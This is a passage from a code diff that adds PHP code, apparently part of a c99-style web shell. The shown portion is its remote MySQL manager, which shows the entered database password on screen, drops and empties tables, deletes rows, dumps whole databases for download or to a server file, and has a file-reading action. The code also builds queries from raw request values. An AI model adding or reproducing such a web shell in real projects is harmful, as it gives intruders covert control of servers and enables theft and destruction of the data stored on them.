foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +echo "</p></td></tr></table><br>"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} +echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = FALSE;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>?nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr> + <td width="30%" height="1"><b>Create a new table:</b> + <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td> + + <td width="30%" height="1"><b>Dump DataBase:</b> + <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "[Pages]&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>?/b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b> + <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" 